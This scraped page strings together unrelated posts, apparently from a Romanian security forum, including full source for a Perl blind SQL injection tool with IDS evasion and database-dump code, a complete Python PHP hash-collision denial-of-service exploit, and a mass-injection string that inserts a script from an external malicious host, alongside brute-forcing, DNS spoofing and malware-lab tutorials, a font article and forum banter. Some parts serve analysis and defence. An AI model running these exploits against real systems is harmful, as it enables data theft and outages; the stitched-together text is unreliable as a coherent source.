denjacker

Info: This script uses blind SQL injection and boolean enumeration to perform INFORMATION_SCHEMA Mapping. The syntax of this script is: perl mysql5enum.pl -h [hostname] -u [url] [-q [query]] Example: perl mysql5enum.pl -h www.target.tld -u http://www.target.tld/vuln.ext?input=24 -q "select system_user()" Description By default, this script will first determine username, version and database name before enumerating the information_schema information. When the -q flag is applied, a user can supply any query that returns only a single cell If the exploit or vulnerability requires a single quote, simply tack %27 to the end of the URI. This script contains error detection : It will only work on a mysql 5.x database, and knows when its queries have syntax errors. This script uses perl's LibWhisker2 for IDS Evasion (The same as Nikto). This script uses the MD5 algorithm for optimization. There are other optimization methods, and this may not work on all sites. Disclaimer Warning: The end-user is liable for his-or her own actions with the use of this software. Running this against a system you do not own without written authorization is a criminal act. Source #!/usr/bin/perl use strict; use Getopt::Std; use Digest::MD5 qw(md5_hex); use LW2; my %options = (); getopts("u:h:q:", \%options); my $url = $options{u}; # Vuln URL my $host = $options{h}; # Needs this for libwhisker # Format. my $count = 0; if (my $q = $opts{q}) { $q =~ s/\ /%20/g; my ($cxr, $result) = runQuery($url,$host,$q); print "Query Result:\n\t$result\nCalculated in $cxr requests.\n"; exit(1); } # Get the Database Version my $query = "SELECT%20VERSION()"; my ($tmp, $version) = runQuery($url, $host, $query); $count += $tmp; $count += 2; print "\nDatabase Version:\t\t$version\nIn $count requests.\n\n"; # Get the Database Name $query = "SELECT%20DATABASE()"; my ($tmp,$answer) = runQuery($url, $host, $query); print "Database Name:\t\t$answer\nIn $tmp requests.\n\n"; # Get the Database Username $query = "SELECT%20USER()"; my ($tmp,$answer) = runQuery($url, $host, $query); print "Database User:\t\t$answer\nIn $tmp requests.\n\n"; if ($version =~ /5\./g) { print "Enumerating Database Spec:\n"; getSchema($url,$host); exit(1); } else { print "This is not MySQL v5.x, so I can't enumerate the schema tables!\n"; exit(1); } sub getSchema { my $url = shift; my $host = shift; my $query = "SELECT COUNT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=(SELECT DATABASE())"; $query =~ s/ /%20/g; my ($c, $val) = runQuery($url,$host,$query); # $val = number of table names in the current database. for (my $i=0; $i < int($val); ++$i) { $query = "SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=(SELECT DATABASE()) LIMIT $i,1"; $query =~ s/ /%20/g; my ($q, $table) = runQuery($url,$host,$query); print "$table:\n"; # $table = table name $query = "SELECT COUNT(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME="; $query .= "(SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA="; $query .= "(SELECT DATABASE()) LIMIT $i,1)"; $query =~ s/ /%20/g; my ($r, $fcount) = runQuery($url,$host,$query); # $fcount - number of columns in the table for (my $n = 0; $n < int($fcount); ++$n) { $query = "SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME="; $query .= "(SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA="; $query .= "(SELECT DATABASE()) LIMIT $i,1) LIMIT $n,1"; $query =~ s/ /%20/g; my ($o, $field) = runQuery($url,$host,$query); print "\t$field\n"; # Uncomment the lines below to # scrape the entire database. # $query = "SELECT COUNT($field) FROM $table"; # $query =~ s/ /%20/g; # my ($r, $total) = runQuery($url,$host,$query); # for (my $cn = 0; $cn < $total; $cn++) # { # $query = "SELECT $field FROM $table LIMIT $cn,1"; # $query =~ s/ /%20/g; # my ($e, $data) = runQuery($url,$host,$query); # print "\t\t$data\n"; # } } } } sub runQuery { my $url = shift; my $host = shift; my $query = shift; my $qCount; my $qCH; my $pos = 1; my $floor = 0; # Bottom of ascii keyrange my $ceiling = 255; # Top of ascii keyrange my $spacer = "%20OR%20"; my $truth = "62=62/*"; my $lie = "88=98/*"; my ($true, $false) = makeTrueFalse($url, $spacer, $truth, $lie, $host); my $lenUri = "$url" . queryConstruct(0, 0, $spacer, $query); my ($qCH, $len) = getValue($lenUri, 64, 0, $true, $false, $host); $qCount += $qCH; my $results = ""; while (($pos < $len) || ($pos eq $len)) { my $uri = "$url" . queryConstruct(1, $pos, $spacer, $query); #construct the actual URI my ($qCH, $value) = getValue($uri, $ceiling, $floor, $true, $false, $host); $qCount += $qCH; my $char = chr("$value"); $results .= $char; ++$pos; } return ($qCount, $results); } #Logrithm sub getValue { my $uri = shift; my $ceiling = shift; my $floor = shift; my $true = shift; my $false = shift; my $host = shift; my $nextmaybe; my $target; my $qCount = 0; my $maybe = int($ceiling/2); # Get the middle of the total possible range of values while (not defined $target) { if (isGT($uri, $maybe, $host) eq $true) { ++$qCount; $floor = $maybe; $nextmaybe = int($maybe + (($ceiling - $floor)/2)); } elsif (isLT($uri, $maybe, $host) eq $true) { ++$qCount; $ceiling = $maybe; $nextmaybe = int($maybe - (($ceiling - $floor)/2)); } elsif (isEQ($uri, $maybe, $host) eq $true) { ++$qCount; $target = $maybe; return ($qCount, $target); } $maybe = $nextmaybe; if (($maybe eq "") || (!$maybe) || (not defined $maybe)) { print "SQL Error caught! Aborting!\n"; print "At least 3 queries in error log!\n"; exit(1); } } } # Is greater than? sub isGT { my $uri = shift; my $guess = shift; my $host = shift; return (md5_hex(download("$uri>$guess)/*", $host))); } # Is less than? sub isLT { my $uri = shift; my $guess = shift; my $host = shift; return (md5_hex(download("$uri<$guess)/*", $host))); } # Is equal to? sub isEQ { my $uri = shift; my $guess = shift; my $host = shift; return (md5_hex(download("$uri=$guess)/*", $host))); } # Ripped off from an older version of the scanner sub download { my $uri = shift; my $try = 5; my $host = shift; my %request; my %response; LW2::http_init_request(\%request); $request{'whisker'}->{'method'} = "GET"; $request{'whisker'}->{'host'} = $host; $request{'whisker'}->{'uri'} = $uri; $request{'whisker'}->{'encode_anti_ids'} = 962; $request{'whisker'}->{'user-agent'} = "wget"; LW2::http_fixup_request(\%request); if(LW2::http_do_request(\%request, \%response)) { if($try < 5) { print "Failed to fetch $uri on try $try. Retrying...\n"; return undef if(!download($uri, $try++)); } print "Failed to fetch $uri.\n"; return undef; } else { return ($response{'whisker'}->{'data'}, $response{'whisker'}->{'data'}); } } sub queryConstruct { my $type = shift; my $pos = shift; my $spacer = shift; my $query = shift; if ($type eq 0) # Len { my $newQuery = "LENGTH(($query))"; my $padding = "("; my $ender = ""; return ("$spacer$padding$newQuery$ender"); } elsif ($type eq 1) # String { my $padding = "((ASCII((LOWER((MID(("; # Begin query construct my $ender = "),$pos,1))))))"; # End query Construct return ("$spacer$padding$query$ender"); #construct the actual query } } sub makeTrueFalse { my $url = shift; my $spacer = shift; my $truth = shift; my $lie = shift; my $host = shift; my $trueMD = md5_hex(download("$url$spacer$truth", $host)); my $falsMD = md5_hex(download("$url$spacer$lie", $host)); # returns true, false return ($trueMD, $falsMD); }

In three words, Cuckoo Sandbox is a malware analysis system. Its goal is to provide you a way to automatically analyze files and collect comprehensive results describing and outlining what such files do while executed inside an isolated environment. It's mostly used to analyze Windows executables, DLL files, PDF documents, Office documents, PHP scripts, Python scripts, Internet URLs and almost anything else you can imagine. But it can do much more... It's up to you to discover what and how. Some of the results that Cuckoo generates are: Trace of performed relevant win32 API calls Dump of network traffic generated during analysis Creation of screenshots taken during analysis Dump of files created, deleted and downloaded by the malware during analysis Trace of assembly instructions executed by malware process In addition, Cuckoo allows you to: Automate submission of analysis tasks Create analysis packages to define custom operations and procedures for performing an analysis Run multiple virtual machines concurrently Script the process and correlation of analysis results data Script and automate the generation of reports in the format you prefer Download latest release : http://www.cuckoobox.org/downloads/0.3.1/cuckoo_0.3.1.tar.gz Cuckoo eats ZeuS v2

We’ve seen several typeface innovations in recent years, including fonts that save ink, fonts that mimic your face and fonts that can be created from scratch. What we hadn’t seen until just recently, however, is a font designed specifically for those with dyslexia. Sure enough, however, Dutch design firm StudioStudio has created a typeface that can be read by dyslexics more easily and with fewer errors. Recognizing that dyslexics tend to rotate letters as well as mix them up, Dyslexie incorporates numerous features to help keep such problems from occurring. Letters are made to look heavier at the bottom by virtue of thicker lines, for instance, making it easier to recognize their true orientation. The differences among letters — such as their openings, extensions and slant — are also exaggerated to make distinguishing them easier. Capital letters and punctuation, meanwhile, are rendered in bold to make the beginnings and endings of sentences more clear. The result of those changes to Dyslexie’s letters, as well as adjustments to the spacing and layout, StudioStudio says, is better reading, confirmed by independent research results. The video below explains the premise in more detail: With so much design work focusing on creating aesthetically pleasing results, it’s often easy to forget the power of design to help with accessibility for those with difficulties such as dyslexia. Others working in design, how can you lend a helping hand? Website: www.studiostudio.nl/project-dyslexie Contact: info@studiostudio.nl Spotted by: Andrea Thorn http://www.springwise.com/style_design/dyslexie/

How to use shell functions to fetch information online Takeaway: Marco Fioretti shows two examples of shell functions that you can use for web scraping when all you need is a quick way to extract text from a given website. Even in this age of touchscreen devices, many computing activities are much faster if you know the right tricks and stick to plain old typing. In my case, this applies to retrieving certain types of information from the Internet. Most of my work consists of typing at a prompt or in applications that, like the Kate text editor or the Dolphin file manager, have an embedded terminal (and one of the reasons I prefer such applications is exactly that they make using certain tricks faster, no matter what else I am doing). I save a not negligible amount of time when I’m doing system administration or just writing some text, thanks to shell functions like those that I’m going to present in a moment. Please note that none of these functions does anything difficult, or advanced. All they do is fetch some simple data from the Internet that I often need — in the fastest possible way — without forcing me to switch to another window. The reason why they are functions instead of autonomous scripts is that I also use them inside several scripts. What are shell functions anyway? n software programming, functions are blocks of code that perform one specific task, written in a way that can be easily reused and shared by many programs, possibly running every time with different input values. Unix shells, that is the command interpreters that actually execute what we type at a prompt or save in a script, have functions just like compiled languages like C or C++. Shell functions can be called either at the prompt or from a script, and you only need to know a few things to start writing and using them: Shell functions must be defined before you invoke them! To have your functions always available at the prompt, you can save them in the $HOME/.bashrc file (or the equivalent one for non-Bash shells) In Bash, the default shell on most Gnu/Linux distributions, functions can be defined in these two equivalent ways: function my_bash_function { the function code goes here... } my_bash_function () { the function code goes here... } Weather forecast A function I (have to) use more than it would be good for me, at least in certain periods, is the one that prints the weather forecast. Yes, I too think that looking out the closest window would be much simpler and smarter, but what when you’re in some conference or meeting room without windows? Here is how this function works: [marco@polaris ~]$ weather Weather for Rome 4°C Thu Fri Sat Sun [sun] Clear [sun] [sun] [par] [sun] Wind: S at 6 km/h Humidity: 75% 10° 3° 12° 4° 13° 5° 11° 3° [marco@polaris ~]$ And this is its code: weather () { w3m -dump "http://www.google.com/search?hl=en&lr=&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=weather+${1}&btnG=Search" >& /tmp/weather grep -A 5 -m 1 "Weather for" /tmp/weather| cut -c28- rm /tmp/weather } The function uses the w3m text-based browser to ask Google the weather forecast, save it in a temporary file and then extract from it, cutting unnecessary empty columns, the six lines starting from the one that contains the “Weather for” string. If invoked without arguments, this function will return the forecast for what Google thinks is your current location, but you may also specify other places, e.g. “weather “San Francisco”. What’s general and great in this function is that it shows how easy it is to get started with Web scraping. This term indicates exactly what you have just seen at work in the example above: download the text version of some Web page, then cut and slice it to extract all and only the data you really need, all automatically. The functions that follow use the same technique to fetch another kind of information I often need. Word Definition What does that word exactly mean? When I’m in doubt, I ask my shell: [marco@polaris ~]$ define weird weird (wîrd) adj. weird·er, weird·est 1. Of, relating to, or suggestive of the preternatural or supernatural. 2. Of a strikingly odd or unusual character; strange. 3. Archaic Of or relating to fate or the Fates. n. 1. a. Fate; destiny. b. One's assigned lot or fortune, especially when evil. The answer, of course, comes from a function very similar to the one that provides weather forecasts: define () { w3m -dump http://www.thefreedictionary.com/weird >& /tmp/define_word grep -A 15 ^Advertisement /tmp/define_word | cut -c20-60 rm /tmp/define_word } If you want to know why I start extracting text from the line that begins with “Advertisement”, type: w3m -dump http://www.thefreedictionary.com/weird | more at a prompt and look closely at the resulting text. Doing that, you will also notice the biggest difference from the other function, besides the obvious fact that this goes to a different website. Since many words have definitions much longer than 15 lines, here I just estimate how many lines I should read to get enough information. Extracting the whole definition and nothing else, regardless of its length, would certainly be possible, but requires more advanced text parsing than I may show you in this space. Besides, doing it would not be worth the effort in this particular case, when all I want is to get a quick idea of what some word means. Credits The two functions above are my own, updated versions of those I originally fetched from David Crouse. Thanks, David! Web scraping is great, and doing it from shell functions makes it even more flexible. http://www.techrepublic.com/blog/opensource/how-to-use-shell-functions-to-fetch-information-online/3317

log2command is a PHP script that tracks IPs in log files and executes shell commands per each IP. log2command was created as a sort of reverse fail2ban or cheap VPN-firewall: a machine with a closed firewall can be told, by a foreign machine, to accept connections from a specific IP. log2command then keeps track of the webserver log file and watches for inactivity from the user's IP. After an amount of time another command is executed that can remove the user's IP from the firewall, closing down the machine again. The PHP script is a command-line program that can be run in the background. :: Download :: http://packetstormsecurity.org/files/download/108299/log2command-1.0.zip

Jessus fingering Christ .... deci bun, te supara ca face si Hydra. Ok !! si din acest motiv eu sunt PRAF !!!111001!!. Prietene .. eu raman praf, si tu crezi ce vrei sa crezi. whatever

There ... i fixed it! Am pus si sursa. Sunt chestii care mi se par mai interesante si le pun la "share" in speranta ca poate tie, tovaras de RST, poate-ti sunt de folos. Daca vrei sa te afirmi cumva si nu stii cum s-o faci , be smart somewhere else.

Learning Goals: Configure a virtual machine based experimental platform for malware analysis. Master basic network sniffing/monitoring skills This Lesson Can be Used as a Lab Module in: Computer Networks and Communication Protocols Operating Systems Challenge of the day: Run the Max++ malware, can you describe its network activities? 1. Introduction This tutorial is intended for those who are interested in malware analysis. We take a step-by-step approach to analyzing a malware named ZeroAccess. Giuseppe Bonfa has provided an excellent analysis [1] of the malware. This mini-series will help you to gain hands-on experiences with the analysis. We assume that you have some basic understanding of X86 assembly, debugging, operating systems, and programming language principles. Instructors are welcome to use this tutorial and integrate it in computer science courses such as computer architecture and operating systems. If you are using this material in your classes, we would appreciate if you follow up with a comment on this site and provide some basic information about your course so that we know our tutorial is helpful. The purpose of this lesson is to set up a virtual machine based analysis environment. Before rolling up your sleeves, please make sure you have the following: Windows XP SP2 installation disk (Note: it has to be SP2) Linux Ubuntu installation disk (the version we use in this tutorial: Ubuntu 10.04 lucid LTS. The version does not really matter) A computer loaded with XP, with at least 50GB of disk space. (later, we refer to this computer: the "host XP") High-speed Internet An account on OffensiveComputing.net (http://www.offensivecomputing.net/) If the screen resolution is too small, start the XP guest, and then click the "Install Guest Additions", and then reboot the XP Guest and adjust its screen resolution ("Right click on desktop -> Properties -> Settings"). 2. Software Installation We will need to download a number of other open-source/free software tools. The installation process is straightforward and we omit most of the details here. The installation process may take about 5 hours. (Hofstra students can check out DVD images of VBox instances from my office Adams 203.) Install Oracle Virtual Box v4.04 on your host XP. (http://www.virtualbox.org/). Create a Windows XP Guest (using your SP2 installation disk. For the VM itself, assign at least 256MB RAM and 10GB disk space.) on VBox manager.(later we refer to this VM instance as "guest XP"). Install the following on your guest XP. Python 2.7. Immunity Debugger (http://www.immunityinc.com/products-immdbg.shtml) IDA Pro Debugger Free Version (http://www.hex-rays.com/idapro/idadown.htm. Note: get the free version but not the evaluation version - it does not allow saving dbg databases) HxD (a binary editor http://mh-nexus.de/en/hxd/) * Download the Malware instance of Max++ from OffensiveComputing.net (instructions available in [1]. The file name is "Max++ downloader install_2010". Don't run it!!!) After the above is done, take a snapshot of the guest SP in VBox. A snapshot allows you to quickly recover to the original status of the system. On your host XP, install WinDbg (http://msdn.microsoft.com/en-us/windows/hardware/gg463009). You might choose to download the entire XP debugging symbols on your host XP (which might speed up the debugging a little). Create a Linux Ubuntu Guest (using your Ubuntu 10.04 installation disk. Assign at least 512MB RAM and 10GB disk space) on VBox. Install the following (you can use apt-get or System->Administration->Synaptic Package Manager which has GUI). Wireshark (a sniffer. "sudo apt-get install wireshark" to install) GDB (GNU debugger) g++ (c++ compiler) Python The current resolution of Linux guest is too small. You can change the screen resolution following the instructions listed on Linux Format Forum [2]. 3. Configuration Up to now, both of your VM guests should have Internet access. What we will do next is to configure both instances so that all the traffic from the XP guest will have to go through the Linux guest. On the Linux guest, we use Wireshark to monitor the network traffic of XP guest when the malware is running. The design is shown in the following figure. 3.1 XP Guest Now power off your XP Guest.In VBox manager, right click on the XP Guest and select "Setting". We will set up the network adapters of XP Guest. In Network -> Tab "Adapter 1": (1) click the "Enable network adapter" checkbox, and (2) select "Internal Network" for "Attached To". (Note: please make sure to use the default network name "intnet" assigned by the VBox manager.)This allows us to separate the XP Guest from the outside world and connects to an internal network managed by the VBox manager. Then we will enable a serial port for WinDbg. The setting is shown as below. Note that it is important to set up the Port/File Path "\\.\pipe\com_11" and the simulate the port as "Host Pipe". Vt-x is a special CPU technology that is used to support virtualization. In Virtual Box, you have to enable it, otherwise hardware breakpoints will not work. Later you will see that the Max++ malware smartly takes advantage of hardware BP for hijacking system calls and it relies on hardware BP - you have to enable the Vt-x, as shown in the following figure. 3.2 Linux Guest We now set up the Linux guest as the gateway computer of the internal network (power off the VBox instance first). It will have two adapters: one connects to the internal network and the other connects to the outside.The following figure shows the setting of the first adapter (Internal Network). In adapter 2, sets the network type ("Attached To") to "NAT". As you know, NAT stands for Network Address Translation. This provides a further layer protection of our VM instances. Note: click the "Advanced" key and make sure that the "Adapter Type" is "Intel Pro/1000". Also change the last two digits of the MAC address to "01" (so that we can easily identify it as Adapter 1 later); similarly change the last two digits of the MAC of the second adapter to "02". If you are using VBox 4.1.0 or later, in the Advanced tab, there is an additional checkbox for "Promiscuous" mode, select "allow for all" (so that all traffic will be intercepted). Now reboot the Linux Ubuntu guest. We need to configure it as a gateway computer. Follow the instructions below: Start a terminal window and type "ifconfig" to get the information of all available adapters. You should be able to see three of them, e.g., in my case "eth1", "eth2", and "lo" (the local loophole interface). If you look at their MAC addresses, you can verify that they are the ones that we set in the VBox manager earlier. Let us assume "eth1" corresponds to the adapter "xx...:01" and "eth2" corresponds to adapter "xx...:02". System -> Preference -> Network Connections. First delete all existing network connections, and set up the first wireless connection following the figures below (use 169.254.236.100 as the static IP). Note that you can get the Gateway for it should be "0.0.0.0" (make sure to hit enter when you finish typing 0.0.0.0 in the third cell - the GUI of Ubuntu has some problems - if you don't hit enter, it will forget the entry you just added), because this is the link to the local internal network and the computer itself is the gateway. Similarly, set up the second wired connection (for the NAT connection), but this time, use DHCP for assigning the IP addresses. Here we are lazy to use the Ubuntu GUI. There are equivalent ifconfig commands for achieving the above if you are interested in exploring by yourself. 3. Now now set up the IP forwarding. Create a file named "network.sh" and "chmod 755 network.sh". The shell script consists of three commands as shown below: sudo sysctl -w net.ipv4.ip_forward=1 sudo iptables -P FORWARD ACCEPT sudo iptables -t nat -A POSTROUTING -o eth2 -j MASQUERADE The first is to enable the ip_forward features of the ipv4 stack in the Linux kernel. The second is to set up the internal firewall called "iptables" to allow forwarding packets. The third is to add a post routing tool and forward all packets to eth2 (note: eth2 is your outlink which corresponds to adapter 2. On your system, it may be a different name). 3.3 Reconfigure XP Guest Now we go back and reset the XP Guest so that it has the Internet access via the Ubuntu guest. Do a "nslookup www.google.com" in your Ubuntu guest and find out DNS server used. Then go to the XP Guest -> Control Panel -> Network Connections -> Right Click (Properties) -> TCP/IP (Properties) -> set the static IP to 169.254.236.200 and set the gateway computer to 169.254.236.100. Set up the DNS server correspondingly. Start a browser and you will NOT have the Internet access yet!. You need to go back to the Ubuntu guest and "sudo ./network.sh". Then you can verify that your XP guest now has the Internet access. Again, "sudo wireshark " you can intercept all the traffic from/to the XP guest (note: when wireshark is started, be sure to click ok on the dialog it pops - otherwise your wireshark is frozen). 4. Challenge of the Day and Conclusion We have successfully constructed a simple analysis environment for Max++. Using the Linux Ubuntu Guest, we can intercept all the packets sent by the malware. The virtual machine technology has provided us the great benefits of quick restoration if any system is broken. You should now make a snapshot of both the XP and Ubuntu guest systems. Finally, the challenge of the day: Run the Max++ malware, can you describe its network activities? References [1] Guiseppe Bonfa, "Step-by-Step Reverse Engineering Malware: ZeroAccess / Max++ / Smiscer Crimeware Rootkit", Available at http://resources.infosecinstitute.com/step-by-step-tutorial-on-reverse-engineering-malware-the-zeroaccessmaxsmiscer-crimeware-rootkit/ [2] udroomla , "How To Increase Screen Resolution with VirtualBox and Ubuntu", Available at http://www.linuxformat.com/forums/viewtopic.php?t=6438 Copyright. 2011. Dr. Xiang Fu. Department of Computer Science, Hofstra University. http://fumalwareanalysis.blogspot.com/2011/08/malware-analysis-tutorial-reverse.html

te scuz .. C ya

PHP 5.3.x hash collision denial of service proof of concept exploit written in Python. It generates the payload on the fly and sends it to the server. ''' This script was written by Christian Mehlmauer <FireFart@gmail.com> Original PHP Payloadgenerator taken from https://github.com/koto/blog-kotowicz-net-examples/tree/master/hashcollision ''' import socket import sys import math import urllib import string import time import urlparse import argparse def main(): parser = argparse.ArgumentParser(description="Take down a remote PHP Host") parser.add_argument("-u", "--url", dest="url", help="Url to attack", required=True) parser.add_argument("-w", "--wait", dest="wait", action="store_true", default=False, help="wait for Response") parser.add_argument("-c", "--count", dest="count", type=int, default=1, help="How many requests") parser.add_argument("-v", "--verbose", dest="verbose", action="store_true", default=False, help="Verbose output") parser.add_argument("-f", "--file", dest="file", help="Save payload to file") parser.add_argument("-o", "--output", dest="output", help="Save Server response to file. This name is only a pattern. HTML Extension will be appended. Implies -w") options = parser.parse_args() url = urlparse.urlparse(options.url) host = url.hostname path = url.path port = url.port if not port: port = 80 if not path: path = "/" print("Generating Payload...") payload = generatePayload() print("Payload generated") if options.file: f = open(options.file, 'w') f.write(payload) f.close() print("Payload saved to %s" % options.file) print("Host: %s" % host) print("Port: %s" % str(port)) print("path: %s" % path) print print for i in range(options.count): print("sending Request #%s..." % str(i+1)) try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) except socket.error, msg: sys.stderr.write("[ERROR] %s\n" % msg[1]) sys.exit(1) try: sock.connect((host, port)) sock.settimeout(None) except socket.error, msg: sys.stderr.write("[ERROR] %s\n" % msg[1]) sys.exit(2) request = "POST %s HTTP/1.0\r\nHost: %s\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %s\r\n\r\n%s\r\n\r\n" % (path, host, str(len(payload)), payload) sock.send(request) if options.verbose: if len(request) > 300: print(request[:300]+"....") else: print(request) print if options.wait or options.output: start = time.clock() data = sock.recv(1024) string = "" while len(data): string = string + data data = sock.recv(1024) elapsed = (time.clock() - start) print ("Request %s finished" % str(i+1)) print ("Request %s duration: %s" % (str(i+1), elapsed)) #only print http header split = string.partition("\r\n\r\n") header = split[0] content = split[2] if options.verbose: print print(header) print if options.output: f = open(options.output+str(i)+".html", 'w') f.write("<!-- "+header+" -->\r\n"+content) f.close() sock.close() def generatePayload(): # Taken from: # https://github.com/koto/blog-kotowicz-net-examples/tree/master/hashcollision # Note: Default max POST Data Length in PHP is 8388608 bytes (8MB) # entries with collisions in PHP hashtable hash function a = {'0':'Ez', '1':'FY', '2':'G8', '3':'H'+chr(23), '4':'D'+chr(122+33)} # how long should the payload be length = 7 size = len(a) post = "" maxvaluefloat = math.pow(size,length) maxvalueint = int(math.floor(maxvaluefloat)) for i in range (maxvalueint): inputstring = base_convert(i, size) result = inputstring.rjust(length, '0') for item in a: result = result.replace(item, a[item]) post += '' + urllib.quote(result) + '=&' return post; def base_convert(num, base): fullalphabet = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ" alphabet = fullalphabet[:base] if (num == 0): return alphabet[0] arr = [] base = len(alphabet) while num: rem = num % base num = num // base arr.append(alphabet[rem]) arr.reverse() return ''.join(arr) if __name__ == "__main__": main() http://packetstormsecurity.org/files/108294

There are many tools available for cracking like, ncrack, brutus and THE hydra but today I want to share patator. Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage. Currently it supports the following modules: * ftp_login : Brute-force FTP * ssh_login : Brute-force SSH * telnet_login : Brute-force Telnet * smtp_login : Brute-force SMTP * smtp_vrfy : Enumerate valid users using the SMTP VRFY command * smtp_rcpt : Enumerate valid users using the SMTP RCPT TO command * http_fuzz : Brute-force HTTP/HTTPS * pop_passd : Brute-force poppassd (not POP3) * ldap_login : Brute-force LDAP * smb_login : Brute-force SMB * mssql_login : Brute-force MSSQL * oracle_login : Brute-force Oracle * mysql_login : Brute-force MySQL * pgsql_login : Brute-force PostgreSQL * vnc_login : Brute-force VNC * dns_forward : Forward lookup subdomains * dns_reverse : Reverse lookup subnets * snmp_login : Brute-force SNMPv1/2 and SNMPv3 * unzip_pass : Brute-force the password of encrypted ZIP files * keystore_pass : Brute-force the password of Java keystore files The name "Patator" comes from patator - YouTube Patator is NOT script-kiddie friendly, please read the README inside patator.py before reporting. Download FTP : Enumerate valid logins on a too verbose server HTTP : Brute-force phpMyAdmin logon SNMPv3 : Find valid usernames SNMPv3 : Find valid passwords DNS : Forward lookup DNS : Reverse lookup two netblocks owned by Google ZIP : Crack a password-protected ZIP file (older pkzip encryption not supported in JtR) SURSA : http://www.ehacking.net/2011/12/patator-multi-purpose-brute-forcing.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+ehacking+%28Ehacking-+Your+Way+To+The+World+Of+IT+Security%29

Spoofing attack is unlike sniffing attack, there is a little difference between spoofing and sniffing. Sniffing is an act to capture or view the incoming and outgoing packets from the network while spoofing is an act to forging one's source address. In spoofing attack an attacker make himself a source or desire address. This is basically done by using some tricks. Spoofing is so general word and it contains attack like DNS spoofing, IP spoofing and others. What Is DNS Spoofing? DNS spoofing is an attack that can categorize under Man-In-The-Middle-Attack, beside DNS Spoofing MIMA contain: ARP poisoning Sessions hijacking SSL hijacking DNS Spoofing Each attack has its own importance but to be sure it is very difficult to discuss all attacks in single article, I will post some more articles related to MIMA. DNS spoofing is an attack in which an attacker force victim to enter his credential into a fake website, the term fake does not mean that the website is a phishing page while. To understand DNS spoofing refer to this pictures. In the normal communication a user send request to the real DNS server while if an attacker spoof the DNS server than this attack is called Man-In-The-Middle-Attack. Now the question is how to perform DNS spoofing attack, the term spoofing is very similar with sniffing and the sniffing tools can used to perform spoofing attack. For this article I will use ettercap. What Is Ettercap? According to official website “Ettercap is a suite for man in the middle attacks on LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks”. It is support cross operating system like it can run on Windows, Linux, BSD and MAC. DNS Spoofing Tutorial With Ettercap-Backtrack5 If you want to learn more background theory than you can ask question by using comment box, now this section will teach you how to perform Spoofing (Man-In-The-Middle-Attack) attack. Requirement: An Operating system (Linux, Windows etc) Ettercap SET I am using backtrack 5 for this tutorial you can use some other OS, social engineering toolkit is not a necessary part but as discussed before about SET tutorial for hacking windows by using fake IP so you can use Spoof your IP into a website. So this is little advance tutorial. It is recommended to use DNS spoofing attack with Social engineering toolkit attack to make the job done effectively.

Firewall and anti-virus are to protect your computer from hacking attack and from viruses but sometimes an attacker can easily bypass them and can get root access into your computer, there are so many techniques and tools are available to bypass or cheat anti-virus and firewall. Buffer overflow is the most common type of computer security attack that allows a hacker to get the administrator access into a computer or a network. As we have discussed so many tutorial by using Backtrack 5 to hack into windows operating system, however there are many exploits are also available for Linux operating system. I really don't know about the author of this video but the video contain a good example of buffer overflow attack by using an exploit. Requirements Backtrack 5 or Backtrack 5 R1 (Attacker) Windows (Victim) Mestaploit Apache Brain

Recently I had the opportunity to present on VoIP insecurity around various conferences this year, on my own and also with Joffrey Czarny. At Secure 2011 we had one day a workshop and one of the things we showed was the effect of a typical SIPVicious attack on an Asterisk box. The following videos (best seen in full screen and high quality) illustrate what happens. 1. When we run svmap.py, nothing usually shows up on the asterisk logs. 2. Running svwar.py floods the logs with attempts for registrations for various extensions. 3. Running svcrack.py on a valid extension shows a large number of "Wrong password" errors. Enumeration and password cracking are not the only attacks being performed on target PBX systems on the Internet. Honeypots and victims are able to pick up a number of INVITE scans looking for "open sip relays". This is a vulnerability that may affect SIP gateways without proper access control or badly configured dialplans that allow calls to pass through without authentication. The following video shows how this looks when done using X-lite (which is what some of the attackers are using) on an Asterisk box. You can see the log entries filling up. Hope someone finds this useful when looking at log files or studying attacks on SIP http://blog.sipvicious.org/2012/01/asterisk-forensics-logs-vs-attackers.html

ti-ar fi pacut asa ? http://static3.emsc.eu/Files/gallery/QUEST/243793/243793_20111117085922.flv

We've had several reports (thanks guys) of sites being injected with the following string: "></title><script src="hXXp://lilupophilupop.com/sl.php"></script> Typically it is inserted into several tables. From the information gathered so far it looks targeted at ASP, IIS and MSSQL backends, but that is just speculation. If you find that you have been infected please let us know and if you can share packets, logs please upload them on the contact form. UPDATE: Thanks to those that posted comments and those that worked behind the scenes. The injection string is along the lines Terry posted in his comments. the one I ran across is (note not the whole string is provided) 73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404 320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f5220736 56c65637420632e---------snip----------9746c653e3c7363726970742727202729204645544348204e4558542046524f4d 205461626c655f437572736f722049444f2040542c404320454e4420434c4f5345205461626c655f437572736f7220444 5414c4c4f43415445205461626c655f437572736f72+as+varchar%284000%29%29+exec%28%40s%29 Which decodes to: declare+@s+varchar(4000)+set+@s=cast(0xset ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('------SNIP------- IN EXEC('UPDATE ['+@T+'] SET ['+@C+']=''"></title><script src="XXXX://lilupophilupop.com/sl.php"></script><!--''+RTRIM(CONVERT(VARCHAR(6000),['+@C+'])) where LEFT(RTRIM(CONVERT(VARCHAR(6000),['+@C+'])),17)<>''"></title><script'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor+................ When discovered yesterday about 80 sites showed in Google, this morning 